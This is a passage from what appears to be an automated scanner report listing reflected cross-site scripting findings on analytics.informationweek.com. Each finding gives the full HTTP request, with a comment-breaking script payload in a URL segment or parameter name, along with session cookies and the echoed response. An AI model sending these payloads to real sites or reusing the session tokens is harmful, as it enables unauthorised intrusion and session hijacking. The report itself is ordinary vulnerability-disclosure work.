Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
%2F148f0a9--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee0ead1f783e%2FRegulatory-compliance%2FRegulatory-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/148f0a9--><script>alert(1)</script>e0ead1f783e/Regulatory-compliance/Regulatory-compliance.html">
...[SNIP]...

3.73. http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/14/Regulatory-compliance/Regulatory-compliance.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 99475--><script>alert(1)</script>1d835a1e36b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/14/Regulatory-compliance99475--><script>alert(1)</script>1d835a1e36b/Regulatory-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:42 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
pliance99475--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E1d835a1e36b%2FRegulatory-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/14/Regulatory-compliance99475--><script>alert(1)</script>1d835a1e36b/Regulatory-compliance.html">
...[SNIP]...

3.74. http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/14/Regulatory-compliance/Regulatory-compliance.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload d29e4--><script>alert(1)</script>8dfe7f79a8e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/14/Regulatory-compliance/Regulatory-compliance.htmld29e4--><script>alert(1)</script>8dfe7f79a8e HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:51 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ance.htmld29e4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8dfe7f79a8e&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.htmld29e4--><script>alert(1)</script>8dfe7f79a8e">
...[SNIP]...

3.75. http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/14/Regulatory-compliance/Regulatory-compliance.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cb493--><script>alert(1)</script>3a29ce36218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/14/Regulatory-compliance/Regulatory-compliance.html?cb493--><script>alert(1)</script>3a29ce36218=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:44:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:48 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 56328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
l%3Fcb493--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3a29ce36218%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html?cb493--><script>alert(1)</script>3a29ce36218=1">
...[SNIP]...

3.76. http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/15/Risk-management/Risk-management.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3b017--><script>alert(1)</script>b342dbc4ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu3b017--><script>alert(1)</script>b342dbc4ff/15/Risk-management/Risk-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:16 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
nweek.com%2Fmenu3b017--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb342dbc4ff%2F15%2FRisk-management%2FRisk-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu3b017--><script>alert(1)</script>b342dbc4ff/15/Risk-management/Risk-management.html">
...[SNIP]...

3.77. http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/15/Risk-management/Risk-management.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 68690--><script>alert(1)</script>5ec01a42a8e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/1568690--><script>alert(1)</script>5ec01a42a8e/Risk-management/Risk-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:29 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
k.com%2Fmenu%2F1568690--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E5ec01a42a8e%2FRisk-management%2FRisk-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1568690--><script>alert(1)</script>5ec01a42a8e/Risk-management/Risk-management.html">
...[SNIP]...

3.78. http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/15/Risk-management/Risk-management.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload f21aa--><script>alert(1)</script>0b84347c146 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/15/Risk-managementf21aa--><script>alert(1)</script>0b84347c146/Risk-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:38 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
5%2FRisk-managementf21aa--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0b84347c146%2FRisk-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/15/Risk-managementf21aa--><script>alert(1)</script>0b84347c146/Risk-management.html">
...[SNIP]...

3.79. http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/15/Risk-management/Risk-management.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 379d3--><script>alert(1)</script>d2d0dc344c3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/15/Risk-management/Risk-management.html379d3--><script>alert(1)</script>d2d0dc344c3 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:49 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:49 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
FRisk-management.html379d3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed2d0dc344c3&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html379d3--><script>alert(1)</script>d2d0dc344c3">
...[SNIP]...

3.80. http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/15/Risk-management/Risk-management.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a2d82--><script>alert(1)</script>67632b3f5b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/15/Risk-management/Risk-management.html?a2d82--><script>alert(1)</script>67632b3f5b1=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:44:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:53 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 53583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
nagement.html%3Fa2d82--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E67632b3f5b1%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html?a2d82--><script>alert(1)</script>67632b3f5b1=1">
...[SNIP]...

3.81. http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/18/Mobile-and-wireless/Mobile-wireless.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload a149b--><script>alert(1)</script>3766ebdc316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menua149b--><script>alert(1)</script>3766ebdc316/18/Mobile-and-wireless/Mobile-wireless.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:07 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
.com%2Fmenua149b--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3766ebdc316%2F18%2FMobile-and-wireless%2FMobile-wireless.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menua149b--><script>alert(1)</script>3766ebdc316/18/Mobile-and-wireless/Mobile-wireless.html">
...[SNIP]...

3.82. http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/18/Mobile-and-wireless/Mobile-wireless.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload bab5e--><script>alert(1)</script>91f10c172cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/18bab5e--><script>alert(1)</script>91f10c172cc/Mobile-and-wireless/Mobile-wireless.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:17 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:18 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
m%2Fmenu%2F18bab5e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E91f10c172cc%2FMobile-and-wireless%2FMobile-wireless.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18bab5e--><script>alert(1)</script>91f10c172cc/Mobile-and-wireless/Mobile-wireless.html">
...[SNIP]...

3.83. http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/18/Mobile-and-wireless/Mobile-wireless.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 19ada--><script>alert(1)</script>95f6d47511 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/18/Mobile-and-wireless19ada--><script>alert(1)</script>95f6d47511/Mobile-wireless.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ile-and-wireless19ada--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E95f6d47511%2FMobile-wireless.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18/Mobile-and-wireless19ada--><script>alert(1)</script>95f6d47511/Mobile-wireless.html">
...[SNIP]...

3.84. http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/18/Mobile-and-wireless/Mobile-wireless.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload e225f--><script>alert(1)</script>8515afb1e2e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/18/Mobile-and-wireless/Mobile-wireless.htmle225f--><script>alert(1)</script>8515afb1e2e HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
